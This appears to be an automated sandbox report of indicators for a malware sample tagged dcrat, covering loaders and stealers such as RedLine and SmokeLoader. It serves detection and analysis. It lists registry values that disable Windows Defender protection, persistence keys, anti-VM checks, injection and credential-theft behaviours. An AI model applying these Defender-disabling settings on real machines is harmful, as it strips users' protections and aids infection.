dcrat | 9fe04c074e78b239c33060da79991d31e31c0d4115a7e5e954df096404c35bf7

Windows Service

Disable or Modify Tools

T1562.001

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	6Qs8fx8.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	6Qs8fx8.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	6Qs8fx8.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	6Qs8fx8.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	6Qs8fx8.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	6Qs8fx8.exe

PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
loader privateloader
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 10 IoCs

resource	yara_rule
behavioral1/memory/3644-21-0x0000000000400000-0x000000000043C000-memory.dmp	family_redline
behavioral1/files/0x000a000000022e4d-103.dat	family_redline
behavioral1/files/0x000a000000022e4d-105.dat	family_redline
behavioral1/memory/2076-106-0x0000000000B20000-0x0000000000B3E000-memory.dmp	family_redline
behavioral1/memory/3796-143-0x00000000001C0000-0x00000000001FE000-memory.dmp	family_redline
behavioral1/memory/3796-144-0x0000000000400000-0x0000000000449000-memory.dmp	family_redline
behavioral1/memory/2796-162-0x0000000000400000-0x0000000000470000-memory.dmp	family_redline
behavioral1/memory/2796-161-0x0000000000590000-0x00000000005EA000-memory.dmp	family_redline
behavioral1/files/0x0007000000022e75-1138.dat	family_redline
behavioral1/files/0x0007000000022e75-1140.dat	family_redline

RisePro
RisePro stealer is an infostealer distributed by PrivateLoader.
stealer risepro
SectopRAT
SectopRAT is a remote access trojan first seen in November 2019.
trojan rat sectoprat

SectopRAT payload 3 IoCs

resource	yara_rule
behavioral1/files/0x000a000000022e4d-103.dat	family_sectoprat
behavioral1/files/0x000a000000022e4d-105.dat	family_sectoprat
behavioral1/memory/2076-106-0x0000000000B20000-0x0000000000B3E000-memory.dmp	family_sectoprat

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader

Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs

description	pid	Process	procid_target
PID 2440 created 3264	2440	latestX.exe	48
PID 2440 created 3264	2440	latestX.exe	48
PID 2440 created 3264	2440	latestX.exe	48
PID 2440 created 3264	2440	latestX.exe	48
PID 2440 created 3264	2440	latestX.exe	48

Downloads MZ/PE file

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File created	C:\Windows\System32\drivers\etc\hosts	latestX.exe

Modifies Windows Firewall 1 TTPs 1 IoCs

evasion

Windows Service

pid	Process
3036	netsh.exe

Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

.NET Reactor proctector 19 IoCs

Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

resource	yara_rule
behavioral1/memory/2164-52-0x00000000048D0000-0x00000000048F0000-memory.dmp	net_reactor
behavioral1/memory/2164-55-0x0000000004990000-0x00000000049AE000-memory.dmp	net_reactor
behavioral1/memory/2164-58-0x0000000004990000-0x00000000049A9000-memory.dmp	net_reactor
behavioral1/memory/2164-59-0x0000000004990000-0x00000000049A9000-memory.dmp	net_reactor
behavioral1/memory/2164-61-0x0000000004990000-0x00000000049A9000-memory.dmp	net_reactor
behavioral1/memory/2164-63-0x0000000004990000-0x00000000049A9000-memory.dmp	net_reactor
behavioral1/memory/2164-65-0x0000000004990000-0x00000000049A9000-memory.dmp	net_reactor
behavioral1/memory/2164-69-0x0000000004990000-0x00000000049A9000-memory.dmp	net_reactor
behavioral1/memory/2164-67-0x0000000004990000-0x00000000049A9000-memory.dmp	net_reactor
behavioral1/memory/2164-71-0x0000000004990000-0x00000000049A9000-memory.dmp	net_reactor
behavioral1/memory/2164-73-0x0000000004990000-0x00000000049A9000-memory.dmp	net_reactor
behavioral1/memory/2164-75-0x0000000004990000-0x00000000049A9000-memory.dmp	net_reactor
behavioral1/memory/2164-77-0x0000000004990000-0x00000000049A9000-memory.dmp	net_reactor
behavioral1/memory/2164-79-0x0000000004990000-0x00000000049A9000-memory.dmp	net_reactor
behavioral1/memory/2164-81-0x0000000004990000-0x00000000049A9000-memory.dmp	net_reactor
behavioral1/memory/2164-83-0x0000000004990000-0x00000000049A9000-memory.dmp	net_reactor
behavioral1/memory/2164-85-0x0000000004990000-0x00000000049A9000-memory.dmp	net_reactor
behavioral1/memory/2164-87-0x0000000004990000-0x00000000049A9000-memory.dmp	net_reactor
behavioral1/memory/2164-89-0x0000000004990000-0x00000000049A9000-memory.dmp	net_reactor

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Control Panel\International\Geo\Nation	1DB4.exe

Executes dropped EXE 24 IoCs

pid	Process
1264	Vq4Rw14.exe
1224	MU2Ae27.exe
3508	2OP2281.exe
3084	4fn811TA.exe
2228	5Iq7mj5.exe
2164	6Qs8fx8.exe
232	1DB4.exe
2076	23C0.exe
3796	2846.exe
4468	InstallSetup5.exe
3588	toolspub2.exe
2796	2B83.exe
3136	Broom.exe
1388	31839b57a4f11171d6abc8bbc4451ee4.exe
2440	latestX.exe
3872	toolspub2.exe
2688	31839b57a4f11171d6abc8bbc4451ee4.exe
4604	89B1.exe
3540	CC87.exe
2796	CFA5.exe
1212	D340.exe
3568	E14B.exe
4932	E6DA.exe
2344	updater.exe

Loads dropped DLL 4 IoCs

pid	Process
3796	2846.exe
3796	2846.exe
2796	2B83.exe
2796	2B83.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Windows security modification 2 TTPs 2 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features	6Qs8fx8.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	6Qs8fx8.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\""	Vq4Rw14.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\""	MU2Ae27.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	dc62fa6400ed62c5dade12c984fb1ffc.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Drops file in System32 directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log	powershell.exe

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 3508 set thread context of 3644	3508	2OP2281.exe	93
PID 3084 set thread context of 4844	3084	4fn811TA.exe	97
PID 3588 set thread context of 3872	3588	toolspub2.exe	130
PID 4604 set thread context of 368	4604	89B1.exe	148

Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs

Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

System Information Discovery

description	ioc	Process
File opened (read-only)	\??\VBoxMiniRdrDN	31839b57a4f11171d6abc8bbc4451ee4.exe

Drops file in Program Files directory 1 IoCs

description	ioc	Process
File created	C:\Program Files\Google\Chrome\updater.exe	latestX.exe

Launches sc.exe 12 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2316	sc.exe
4920	sc.exe
1852	sc.exe
3200	sc.exe
3652	sc.exe
952	sc.exe
3796	sc.exe
1856	sc.exe
3372	sc.exe
4452	sc.exe
2796	sc.exe
3532	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 3 IoCs

pid	pid_target	Process	procid_target
1328	2164	WerFault.exe	103
3392	3796	WerFault.exe	116
4796	2796	WerFault.exe	124

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	5Iq7mj5.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	5Iq7mj5.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	5Iq7mj5.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub2.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub2.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub2.exe

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

pid	Process
2672	schtasks.exe
1404	schtasks.exe

Enumerates processes with tasklist 1 TTPs 2 IoCs

Process Discovery

T1057

pid	Process
3580	tasklist.exe
2988	tasklist.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-104 = "Central Brazilian Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-911 = "Mauritius Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1041 = "Ulaanbaatar Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-932 = "Coordinated Universal Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-222 = "Alaskan Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2342 = "Haiti Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-981 = "Kamchatka Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2412 = "Marquesas Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1501 = "Turkey Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-201 = "US Mountain Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-341 = "Egypt Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2942 = "Sao Tome Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1021 = "Bangladesh Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2372 = "Easter Island Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1831 = "Russia TZ 2 Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-672 = "AUS Eastern Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-682 = "E. Australia Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-434 = "Georgian Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-872 = "Pakistan Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1891 = "Russia TZ 3 Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-449 = "Azerbaijan Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-842 = "Argentina Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-272 = "Greenwich Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1801 = "Line Islands Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-3051 = "Qyzylorda Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-402 = "Arabic Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-251 = "Dateline Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2941 = "Sao Tome Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2432 = "Cuba Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-982 = "Kamchatka Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-892 = "Morocco Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2771 = "Omsk Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1931 = "Russia TZ 11 Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1411 = "Syria Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-161 = "Central Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-41 = "E. South America Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2512 = "Lord Howe Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-12 = "Azores Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-361 = "GTB Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2531 = "Chatham Islands Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-141 = "Canada Central Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-271 = "Greenwich Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-631 = "Tokyo Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2392 = "Aleutian Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2228	5Iq7mj5.exe
2228	5Iq7mj5.exe
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
2164	6Qs8fx8.exe
2164	6Qs8fx8.exe
3264	Explorer.EXE
3264	Explorer.EXE

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3264	Explorer.EXE

Suspicious behavior: MapViewOfSection 2 IoCs

pid	Process
2228	5Iq7mj5.exe
3872	toolspub2.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2164	6Qs8fx8.exe
Token: SeShutdownPrivilege	3264	Explorer.EXE
Token: SeCreatePagefilePrivilege	3264	Explorer.EXE
Token: SeShutdownPrivilege	3264	Explorer.EXE
Token: SeCreatePagefilePrivilege	3264	Explorer.EXE
Token: SeShutdownPrivilege	3264	Explorer.EXE
Token: SeCreatePagefilePrivilege	3264	Explorer.EXE
Token: SeShutdownPrivilege	3264	Explorer.EXE
Token: SeCreatePagefilePrivilege	3264	Explorer.EXE
Token: SeShutdownPrivilege	3264	Explorer.EXE
Token: SeCreatePagefilePrivilege	3264	Explorer.EXE
Token: SeShutdownPrivilege	3264	Explorer.EXE
Token: SeCreatePagefilePrivilege	3264	Explorer.EXE
Token: SeShutdownPrivilege	3264	Explorer.EXE
Token: SeCreatePagefilePrivilege	3264	Explorer.EXE
Token: SeShutdownPrivilege	3264	Explorer.EXE
Token: SeCreatePagefilePrivilege	3264	Explorer.EXE
Token: SeDebugPrivilege	2076	23C0.exe
Token: SeShutdownPrivilege	3264	Explorer.EXE
Token: SeCreatePagefilePrivilege	3264	Explorer.EXE
Token: SeShutdownPrivilege	3264	Explorer.EXE
Token: SeCreatePagefilePrivilege	3264	Explorer.EXE
Token: SeShutdownPrivilege	3264	Explorer.EXE
Token: SeCreatePagefilePrivilege	3264	Explorer.EXE
Token: SeShutdownPrivilege	3264	Explorer.EXE
Token: SeCreatePagefilePrivilege	3264	Explorer.EXE
Token: SeShutdownPrivilege	3264	Explorer.EXE
Token: SeCreatePagefilePrivilege	3264	Explorer.EXE
Token: SeShutdownPrivilege	3264	Explorer.EXE
Token: SeCreatePagefilePrivilege	3264	Explorer.EXE
Token: SeShutdownPrivilege	3264	Explorer.EXE
Token: SeCreatePagefilePrivilege	3264	Explorer.EXE
Token: SeShutdownPrivilege	3264	Explorer.EXE
Token: SeCreatePagefilePrivilege	3264	Explorer.EXE
Token: SeShutdownPrivilege	3264	Explorer.EXE
Token: SeCreatePagefilePrivilege	3264	Explorer.EXE
Token: SeShutdownPrivilege	3264	Explorer.EXE
Token: SeCreatePagefilePrivilege	3264	Explorer.EXE
Token: SeShutdownPrivilege	3264	Explorer.EXE
Token: SeCreatePagefilePrivilege	3264	Explorer.EXE
Token: SeShutdownPrivilege	3264	Explorer.EXE
Token: SeCreatePagefilePrivilege	3264	Explorer.EXE
Token: SeShutdownPrivilege	3264	Explorer.EXE
Token: SeCreatePagefilePrivilege	3264	Explorer.EXE
Token: SeDebugPrivilege	4320	powershell.exe
Token: SeShutdownPrivilege	3264	Explorer.EXE
Token: SeCreatePagefilePrivilege	3264	Explorer.EXE
Token: SeDebugPrivilege	1388	31839b57a4f11171d6abc8bbc4451ee4.exe
Token: SeImpersonatePrivilege	1388	31839b57a4f11171d6abc8bbc4451ee4.exe
Token: SeDebugPrivilege	4880	powershell.exe
Token: SeDebugPrivilege	3972	cmd.exe
Token: SeShutdownPrivilege	3264	Explorer.EXE
Token: SeCreatePagefilePrivilege	3264	Explorer.EXE
Token: SeDebugPrivilege	2252	powershell.exe
Token: SeShutdownPrivilege	3764	powercfg.exe
Token: SeCreatePagefilePrivilege	3764	powercfg.exe
Token: SeShutdownPrivilege	5076	powercfg.exe
Token: SeCreatePagefilePrivilege	5076	powercfg.exe
Token: SeShutdownPrivilege	1224	powercfg.exe
Token: SeCreatePagefilePrivilege	1224	powercfg.exe
Token: SeShutdownPrivilege	2164	Conhost.exe
Token: SeCreatePagefilePrivilege	2164	Conhost.exe
Token: SeIncreaseQuotaPrivilege	2252	powershell.exe
Token: SeSecurityPrivilege	2252	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
3136	Broom.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4420 wrote to memory of 1264	4420	dc62fa6400ed62c5dade12c984fb1ffc.exe	86
PID 4420 wrote to memory of 1264	4420	dc62fa6400ed62c5dade12c984fb1ffc.exe	86
